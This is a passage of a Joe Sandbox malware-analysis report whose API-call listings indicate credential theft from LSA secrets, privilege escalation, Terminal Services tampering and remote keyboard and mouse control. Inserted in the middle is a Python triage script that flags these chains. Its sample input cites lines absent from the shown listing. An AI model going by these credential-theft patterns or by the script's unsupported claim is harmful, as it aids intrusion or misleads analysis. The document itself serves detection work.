                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$wsprintf
                                                  • String ID: .$2$3$D$I$L$_RasDefaultCredentials#0$LsaFreeMemory$P$RasDialParams!%s#0$V$d
                                                  • API String ID: 2290142023-608447665
                                                  • Opcode ID: ce02f7ea02b34bf1def763f01addefc66c280edfd5cd4819a27cc4b3bb6cd685
                                                  • Instruction ID: 4c1d29f0bd828654cd513fdf21a7457cee7c04ca4083380b940b1afa8f540c18
                                                  • Opcode Fuzzy Hash: ce02f7ea02b34bf1def763f01addefc66c280edfd5cd4819a27cc4b3bb6cd685
                                                  • Instruction Fuzzy Hash: 123105751083809FE301CF68C894A6BBBE9AF99B04F44495CF5C987342D775E90CCBA6
                                                  APIs
                                                  • LoadLibraryA.KERNEL32 ref: 1000105A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10001061
                                                  • #823.MFC42(000003E8), ref: 1000109D
                                                  • #823.MFC42(00000020,000003E8), ref: 100010A7
                                                  • #823.MFC42(000003E8,00000020,000003E8), ref: 100010B2
                                                  • #823.MFC42(00000020,000003E8,00000020,000003E8), ref: 100010BC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823$AddressLibraryLoadProc
                                                  • String ID: A$C$E$KERNEL32.dll$a$n$r$v
                                                  • API String ID: 4155842574-2549505875
                                                  • Opcode ID: a16daf83469977fc098d6e9d6d2204c32631686849e5759c66df8540c12cc638
                                                  • Instruction ID: d4cdf86d6ce510d6661d11d19ce4d48ee2c343f99e241af99f0dca74e59b5833
                                                  • Opcode Fuzzy Hash: a16daf83469977fc098d6e9d6d2204c32631686849e5759c66df8540c12cc638
                                                  • Instruction Fuzzy Hash: 9E317CB04087819ED310CF69D844647FBE8FF59308F44495EE1C987712D7B9E648CBAA
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 10027190
                                                  • lstrcatA.KERNEL32(?,\termsrv.dll), ref: 100271A0
                                                    • Part of subcall function 1001B690: GetCurrentProcess.KERNEL32(00000028,00000000,00000001,?,?), ref: 1001B69A
                                                    • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
                                                    • Part of subcall function 100270F0: CreateToolhelp32Snapshot.KERNEL32 ref: 10027105
                                                    • Part of subcall function 100270F0: Process32First.KERNEL32(00000000,?), ref: 10027112
                                                    • Part of subcall function 100270F0: Process32Next.KERNEL32(00000000,?), ref: 10027150
                                                    • Part of subcall function 100270F0: CloseHandle.KERNEL32(00000000,00000000,?), ref: 1002715B
                                                    • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
                                                    • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
                                                    • Part of subcall function 1001B690: GetLastError.KERNEL32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6F0
                                                    • Part of subcall function 1001B690: CloseHandle.KERNEL32(00000000,?,00000000,?,00000010,00000000,00000000), ref: 1001B6FF
                                                    • Part of subcall function 1001B690: CloseHandle.KERNEL32(?,?,00000000,?,00000010,00000000,00000000), ref: 1001B710
                                                  • GetProcessId.KERNEL32(csrss.exe,?,?,?,00000065,?,?,\termsrv.dll), ref: 100271E9
                                                  • AbortSystemShutdownA.ADVAPI32(00000000), ref: 100271F9
                                                  • GetProcessId.KERNEL32(drwtsn32.exe,?,75570F00,?,?,?,00000065,?,?,\termsrv.dll), ref: 10027212
                                                  • EnumWindows.USER32(10026EF0,00000000), ref: 10027222
                                                  • EnumWindows.USER32(10026EF0,00000000), ref: 1002722A
                                                  • Sleep.KERNEL32(0000000A,?,75570F00,?,?,?,00000065,?,?,\termsrv.dll), ref: 1002722E
                                                  • AbortSystemShutdownA.ADVAPI32(00000000), ref: 10027232
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CloseHandleSystem$AbortEnumProcess32ShutdownTokenWindows$AdjustCreateCurrentDirectoryErrorFirstLastLookupNextOpenPrivilegePrivilegesSleepSnapshotToolhelp32Valuelstrcat
                                                  • String ID: SeDebugPrivilege$SeShutdownPrivilege$\termsrv.dll$csrss.exe$drwtsn32.exe
                                                  • API String ID: 1044539573-3630850118
                                                  • Opcode ID: 6c9e992c0fc163b916cdfcc23b81b9a1f1acd26940f59c35f2752ab5a36c769a
                                                  • Instruction ID: 339130026bb2bf0d2d1701da694e5a8bd89523d213cb69a03697529ac0af6141
                                                  • Opcode Fuzzy Hash: 6c9e992c0fc163b916cdfcc23b81b9a1f1acd26940f59c35f2752ab5a36c769a
                                                  • Instruction Fuzzy Hash: 5E11E57D600309BBF710E7B4AC86FDA3658FB58784F840424FB08990D2EB79F8848676
                                                  APIs
                                                  • #823.MFC42(0000001C,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006540
                                                  • #825.MFC42(00000000,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006583
                                                  • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006597
                                                  • #825.MFC42(00000000,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100065DD
                                                  • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100065F1
                                                  • #825.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006637
                                                  • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 1000664B
                                                  • #825.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 10006691
                                                  • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100066A5
                                                  • #825.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100066EB
                                                  • #823.MFC42(?,00000000,?,00000000,00000000,?,10006386,?,?,00000000,?,?,00000000,?,?), ref: 100066FF
                                                  • #825.MFC42(?,?,?), ref: 10006758
                                                  • #823.MFC42(?,?,?), ref: 1000676C
                                                  • #825.MFC42(00000000,?,?), ref: 100067B1
                                                  • #823.MFC42(?,?,?), ref: 100067C5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: #823$#825
                                                  • String ID:
                                                  • API String ID: 2704444950-0
                                                  • Opcode ID: 7bec8dbf16562bad003da3af1f42c1a03097033c04e808ff0bba191b4fb42cb9
                                                  • Instruction ID: 60a5b56d8eae0c97300d1150149c5d3cd1187e5e90251027326246755cc62438
                                                  • Opcode Fuzzy Hash: 7bec8dbf16562bad003da3af1f42c1a03097033c04e808ff0bba191b4fb42cb9
                                                  • Instruction Fuzzy Hash: 0BC1D0B57046054BEB18CE38D89292B77D2EF982A0B65863CFD1A877C5DF71ED058780
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,MultiByteToWideChar,00000000,?,0000005C,?,1000620E,00000000), ref: 10006416
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1000641F
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,WideCharToMultiByte,?,0000005C,?,1000620E,00000000), ref: 1000642F
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10006432
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,lstrlenA,?,0000005C,?,1000620E,00000000), ref: 10006442
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10006445
                                                  • #823.MFC42(00000002,?,0000005C,?,1000620E,00000000), ref: 10006461
                                                  • #823.MFC42(00000002,00000002,?,0000005C,?,1000620E,00000000), ref: 10006469
                                                  • #825.MFC42(00000000,?,0000005C,?,1000620E,00000000), ref: 10006495
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$#823$#825
                                                  • String ID: KERNEL32.dll$MultiByteToWideChar$WideCharToMultiByte$lstrlenA
                                                  • API String ID: 1309867234-4059950253
                                                  • Opcode ID: 5afda445d53fb012d2fd93e3f1f0fcc127a204d4534de600f34ff66f53386706
                                                  • Instruction ID: d38de5e7d733c2c0227049bdb78a0ea508dceebb21622f4ca20d5dfa4cfc4dbc
                                                  • Opcode Fuzzy Hash: 5afda445d53fb012d2fd93e3f1f0fcc127a204d4534de600f34ff66f53386706
                                                  • Instruction Fuzzy Hash: 2E1106B694131837DA20A7B56C49F9B3E9CDF967B1F15052AFB00B7181D964A804C6F2
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(?,?,?,?,00000010), ref: 1002BD4B
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002BD52
                                                    • Part of subcall function 1002BFA0: LoadLibraryA.KERNEL32(USER32.dll,OpenDesktopA,?,?,00000000,1002BD69,00000000), ref: 1002BFBB
                                                    • Part of subcall function 1002BFA0: GetProcAddress.KERNEL32(00000000), ref: 1002BFC4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: .$2$3$K$L$N$R$S$d$n$v
                                                  • API String ID: 2574300362-924470386
                                                  • Opcode ID: 0be4a78ea3ca6789cddf9191ef90585fe08e7675e10535fba2f937f710853e8b
                                                  • Instruction ID: f587192977155dba1771fbf980f3db4c254de801381f46c0f03346595a95ac4e
                                                  • Opcode Fuzzy Hash: 0be4a78ea3ca6789cddf9191ef90585fe08e7675e10535fba2f937f710853e8b
                                                  • Instruction Fuzzy Hash: CC318075D092CCDEDB01CBE8D884ADEFFB8AF2A240F084159E54577382C2794608CBB6
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(KERNEL32.dll,GetCurrentThreadId,75570BD0,00000000,?,7556F550), ref: 1002BF0A
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002BF13
                                                  • LoadLibraryA.KERNEL32(USER32.dll,GetThreadDesktop,?,7556F550), ref: 1002BF21
                                                  • GetProcAddress.KERNEL32(00000000), ref: 1002BF24
                                                  • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 1002BF48
                                                  • SetThreadDesktop.USER32(?,?,7556F550), ref: 1002BF5E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc$DesktopInformationObjectThreadUser
                                                  • String ID: CloseDesktop$GetCurrentThreadId$GetThreadDesktop$KERNEL32.dll$USER32.dll
                                                  • API String ID: 2607951617-608436089
                                                  • Opcode ID: c0c3ea56cdc1080090144fbb2db9b1c23dc684a9b29fcc628cfea7fef181f00d
                                                  • Instruction ID: 7782cd6523706058525b38559df4a6a9aebe8a97a2597f955c92ab7f26c7b295
                                                  • Opcode Fuzzy Hash: c0c3ea56cdc1080090144fbb2db9b1c23dc684a9b29fcc628cfea7fef181f00d
                                                  • Instruction Fuzzy Hash: 2E01D8B674031C2BE610A7B9BC88EDB774CEBC0761F850532FB04D2141EA6DA84596B4
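The function entries above expose three behaviour chains worth pulling out of the raw listing: the LoadLibraryA/GetProcAddress resolver whose recovered arguments include LsaOpenPolicy and the LSA secret names L$_RasDefaultCredentials#0 and RasDialParams!%s#0, the function that enables privileges (OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges) and walks processes with CreateToolhelp32Snapshot/Process32Next while building the path \termsrv.dll, and the function that switches desktops with SetThreadDesktop. The script below is an added triage example, not part of the Joe Sandbox report or its tooling: it parses "APIs" blocks in the report's own line format (including "Part of subcall function" lines) and flags those chains. The rule names and the chain definitions are my own assumptions; the sample input is a subset of the lines shown in the listing above. Because Joe Sandbox argument recovery is heuristic ("?" marks an unresolved value), the rules key on API names and treat argument strings only as a secondary signal.

```python
import re

# Sample input: lines copied from the "APIs" blocks of the listing above
# (a subset; bullet and indentation follow the report's layout).
SAMPLE_LISTING = r"""
APIs
• LoadLibraryA.KERNEL32 ref: 10005AA7
• GetProcAddress.KERNEL32(00000000), ref: 10005AAE
  • Part of subcall function 10005310: LoadLibraryA.KERNEL32(kernel32.dll,FreeLibrary,?,L$_RasDefaultCredentials#0,00000000), ref: 1000532C
  • Part of subcall function 100058B0: LoadLibraryA.KERNEL32(?,LsaOpenPolicy), ref: 10005923
• wsprintfA.USER32 ref: 10005B17
Strings
APIs
• GetSystemDirectoryA.KERNEL32(00000000,00000104), ref: 10027190
• lstrcatA.KERNEL32(?,\termsrv.dll), ref: 100271A0
  • Part of subcall function 1001B690: OpenProcessToken.ADVAPI32(00000000), ref: 1001B6A1
  • Part of subcall function 100270F0: CreateToolhelp32Snapshot.KERNEL32 ref: 10027105
  • Part of subcall function 100270F0: Process32Next.KERNEL32(00000000,?), ref: 10027150
  • Part of subcall function 1001B690: LookupPrivilegeValueA.ADVAPI32(00000000,?,?), ref: 1001B6D2
  • Part of subcall function 1001B690: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 1001B6EA
• AbortSystemShutdownA.ADVAPI32(00000000), ref: 100271F9
Strings
APIs
• LoadLibraryA.KERNEL32(USER32.dll,GetThreadDesktop,?,7556F550), ref: 1002BF21
• GetProcAddress.KERNEL32(00000000), ref: 1002BF24
• SetThreadDesktop.USER32(?,?,7556F550), ref: 1002BF5E
Strings
"""

# One call line: optional "Part of subcall function X:" prefix, then
# Api.Module, optional "(args)", optional comma, then "ref: address".
CALL_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[^\s.(]+)\.(?P<mod>[^\s(,]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumed rules (my names, not Joe Sandbox's): a rule fires when every API in
# the set is present in the entry (direct calls plus subcall calls), or when
# one of the listed substrings appears among the recovered arguments.
RULES = [
    ("dynamic-import-resolution", {"LoadLibraryA", "GetProcAddress"}, ()),
    ("privilege-adjustment",
     {"OpenProcessToken", "LookupPrivilegeValueA", "AdjustTokenPrivileges"}, ()),
    ("process-enumeration", {"CreateToolhelp32Snapshot", "Process32Next"}, ()),
    ("desktop-switching", {"SetThreadDesktop"}, ()),
    ("shutdown-interference", {"AbortSystemShutdownA"}, ()),
    # LSA secret names that hold stored RAS/dial-up credentials; seeing them
    # next to LsaOpenPolicy is the pattern of an LSA secret dumper.
    ("lsa-secret-access", set(),
     ("LsaOpenPolicy", "L$_RasDefaultCredentials", "RasDialParams")),
]


def parse_entries(text):
    """Split the listing at each "APIs" heading and return, per function
    entry, the list of parsed calls in listing order."""
    entries = []
    for line in text.splitlines():
        if line.strip() == "APIs":
            entries.append([])
            continue
        m = CALL_RE.match(line)
        if m and entries:
            args = [a for a in (m.group("args") or "").split(",") if a]
            entries[-1].append({
                "api": m.group("api"), "module": m.group("mod"),
                "args": args, "ref": m.group("ref"),
                "subcall": m.group("sub"),  # None when the call is direct
            })
    return entries


def classify(calls):
    """Return the rule names that fire for one entry's calls."""
    apis = {c["api"] for c in calls}
    argtext = " ".join(a for c in calls for a in c["args"])
    flags = []
    for name, needed, strings in RULES:
        if needed and needed <= apis:
            flags.append(name)
        elif strings and any(s in argtext for s in strings):
            flags.append(name)
    return flags


def triage(text):
    """Per entry: the distinct API names seen and the behaviour flags."""
    return [{"apis": sorted({c["api"] for c in calls}), "flags": classify(calls)}
            for calls in parse_entries(text)]


if __name__ == "__main__":
    for i, entry in enumerate(triage(SAMPLE_LISTING)):
        print(f"entry {i}: {', '.join(entry['flags']) or 'no flags'}")
```

Feed it the full "APIs" blocks of a report (copy the text of the function listing into a file) to get a per-function map of behaviour chains; the subcall attribution is preserved in each parsed call so a flag can be traced back to the helper function (for example 1001B690 for the privilege chain) rather than only to the caller.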
                                                  APIs
                                                  • LoadCursorA.USER32(00000000,00000000), ref: 10017DFF
                                                    • Part of subcall function 10018A20: ReleaseDC.USER32(00000000,?), ref: 10018A38
                                                    • Part of subcall function 10018A20: GetDC.USER32(00000000), ref: 10018A40
                                                  • GetDC.USER32(00000000), ref: 10017E52
                                                  • QueryPerformanceFrequency.KERNEL32(00000030), ref: 10017E5F
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10017E81
                                                  • GetDeviceCaps.GDI32(?,00000076), ref: 10017E9E
                                                  • GetDeviceCaps.GDI32(?,00000075), ref: 10017EA9
                                                  • CreateCompatibleDC.GDI32(?), ref: 10017EC7
                                                  • CreateCompatibleDC.GDI32(?), ref: 10017ED0
                                                  • CreateCompatibleDC.GDI32(?), ref: 10017ED9
                                                  • CreateDIBSection.GDI32(?,?,00000000,00000058,00000000,00000000), ref: 10017F26
                                                  • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 10017F37
                                                  • SelectObject.GDI32(?,?), ref: 10017F4A
                                                  • SelectObject.GDI32(?,?), ref: 10017F54
                                                  • #823.MFC42(?,?,?,?,00000000), ref: 10017F5F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Create$Compatible$CapsDeviceObjectSectionSelect$#823CursorFrequencyLoadPerformanceQueryReleaseUnothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID:
                                                  • API String ID: 1396098503-0
                                                  • Opcode ID: b320cf3e43d5f69ce13cdc363c04ae0b3c7bef57714eee9ac65f9eae9de58433
                                                  • Instruction ID: f5b09e1389df2f3a8d9c5176518bf7bbc65b6c3c0f8f13021ea446bacafcd8a0
                                                  • Opcode Fuzzy Hash: b320cf3e43d5f69ce13cdc363c04ae0b3c7bef57714eee9ac65f9eae9de58433
                                                  • Instruction Fuzzy Hash: 2981F2B5504B459FD320CF29C884A6BFBF9FB88704F008A1DE58A87750DB79F8058B91
                                                  APIs
                                                    • Part of subcall function 1002C5D0: GetCurrentThreadId.KERNEL32 ref: 1002C5E2
                                                    • Part of subcall function 1002C5D0: GetThreadDesktop.USER32(00000000), ref: 1002C5E9
                                                    • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C61C
                                                    • Part of subcall function 1002C5D0: OpenInputDesktop.USER32(00000000,00000000,02000000), ref: 1002C627
                                                    • Part of subcall function 1002C5D0: GetUserObjectInformationA.USER32(00000000,00000002,?,00000100,?), ref: 1002C64E
                                                    • Part of subcall function 1002C5D0: lstrcmpiA.KERNEL32(?,?), ref: 1002C65D
                                                    • Part of subcall function 1002C5D0: SetThreadDesktop.USER32(00000000), ref: 1002C668
                                                    • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C680
                                                    • Part of subcall function 1002C5D0: CloseDesktop.USER32(00000000), ref: 1002C683
                                                  • SetCursorPos.USER32(?,?,?,?,?,?,1001751F,?,?,00000000), ref: 10017A28
                                                  • WindowFromPoint.USER32(?,?,?,?,?,?,1001751F,?,?,00000000), ref: 10017A30
                                                  • SetCapture.USER32(00000000,?,?,?,?,1001751F,?,?,00000000), ref: 10017A37
                                                  • LoadLibraryA.KERNEL32(USER32.dll,keybd_event,?,?,?,?,1001751F,?,?,00000000), ref: 10017A4D
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10017A50
                                                  • LoadLibraryA.KERNEL32(USER32.dll,mouse_event,?,?,?,?,1001751F,?,?,00000000), ref: 10017A5E
                                                  • GetProcAddress.KERNEL32(00000000), ref: 10017A61
                                                  • MapVirtualKeyA.USER32(?,00000000), ref: 10017A9A
                                                  • MapVirtualKeyA.USER32(?,00000000), ref: 10017AB4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4028022919.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                   • Associated: 00000000.00000002.4028002367.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100B7000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100C8000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100D9000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028090930.00000000100EA000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028192131.00000000100FA000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028222299.000000001011E000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028245300.0000000010120000.00000008.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.4028280245.000000001019A000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Desktop$Thread$AddressCloseInformationLibraryLoadObjectProcUserVirtual$CaptureCurrentCursorFromInputOpenPointWindowlstrcmpi
                                                  • String ID: USER32.dll$keybd_event$mouse_event
                                                  • API String ID: 1441364844-718119381
                                                  • Opcode ID: 80c9abde4b12d50efe92c4b3546a67d4ac8343425a33d2bf32e8b82d811461be
                                                  • Instruction ID: 2451a04a9bde1e7bfa8f86e37c24795d67c21f324d001409fd558fbe77f3f18c
                                                  • Opcode Fuzzy Hash: 80c9abde4b12d50efe92c4b3546a67d4ac8343425a33d2bf32e8b82d811461be
